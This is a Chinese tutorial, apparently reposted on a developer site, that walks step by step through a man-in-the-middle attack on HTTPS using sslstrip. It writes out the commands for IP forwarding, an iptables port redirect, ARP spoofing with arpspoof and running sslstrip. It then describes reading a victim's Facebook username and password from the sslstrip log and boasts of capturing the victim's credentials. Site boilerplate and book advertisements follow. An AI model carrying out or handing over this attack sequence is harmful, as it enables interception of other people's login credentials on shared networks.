利用sslstrip对HTTPS连接发起中间人攻击

栏目: 服务器 · 发布时间: 6年前

内容简介:利用SSLStrip发起中间人攻击可以透明地劫持网络中的http流量,查找HTTPS链接并重定向,然后将这些链接映射到类似的HTTP链接中或者同形的HTTPS链接。它还支持提供类似锁定图标,选择性日志记录和拒绝会话的模式。step1

利用SSLStrip发起中间人攻击可以透明地劫持网络中的http流量,查找HTTPS链接并重定向,然后将这些链接映射到类似的HTTP链接中或者同形的HTTPS链接。

它还支持提供类似锁定图标,选择性日志记录和拒绝会话的模式。

step1

首先我们将设备设置为转发模式,这样我们的设备就可以转发目标不是我们设备的数据包。

echo 1>/proc/sys/net/ipv4/ip_forward

step2

还需要设置iptables,将流量从80端口重定向到8080端口,确保出站连接发送到sslstrip中。

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

step3

需要找到我们的网关

route -n

前三步如图所示

利用sslstrip对HTTPS连接发起中间人攻击

step4

接下来我们需要找到目标主机的IP地址

利用sslstrip对HTTPS连接发起中间人攻击

step5

攻击者利用ARP欺骗技术将虚假的ARP消息发送到局域网中。

arpspoof -i -t

利用sslstrip对HTTPS连接发起中间人攻击

step6

现在我们打开一个新的终端并监听8080端口,命令如下

sslstrip -l 8080

利用sslstrip对HTTPS连接发起中间人攻击

step7

现在我们转到受害主机中,并且在浏览器中输入facebook.com,我们知道Facebook本来是使用的HTTPS协议,但是这里我们看到与Facebook是通过http建立的连接。

利用sslstrip对HTTPS连接发起中间人攻击

step8

现在,返回到家目录,查看sslstrip.log日志文件,我们可以看到受害者登录时输入的用户名和密码,如图:

利用sslstrip对HTTPS连接发起中间人攻击

就是这么easy,我们就拿到了受害者的凭证。

更多kali Linux教程,请参考:

·Lynis— 开源安全审计 工具 详解

· sqlmap- 检测和利用 SQL 注入详解

· HPING3— 网络扫描器-包生成器


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

计算机网络(第5版)

计算机网络(第5版)

Andrew S. Tanenbaum、David J. Wetherall / 严伟、潘爱民 / 清华大学出版社 / 2012-3-1 / 89.50元

本书是国内外使用最广泛、最权威的计算机网络经典教材。全书按照网络协议模型自下而上(物理层、数据链路层、介质访问控制层、网络层、传输层和应用层)有系统地介绍了计算机网络的基本原理,并结合Internet给出了大量的协议实例。在讲述网络各层次内容的同时,还与时俱进地引入了最新的网络技术,包括无线网络、3G蜂窝网络、RFID与传感器网络、内容分发与P2P网络、流媒体传输与IP语音,以及延迟容忍网络等。另......一起来看看 《计算机网络(第5版)》 这本书的介绍吧!

RGB转16进制工具
RGB转16进制工具

RGB HEX 互转工具

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器

HSV CMYK 转换工具
HSV CMYK 转换工具

HSV CMYK互换工具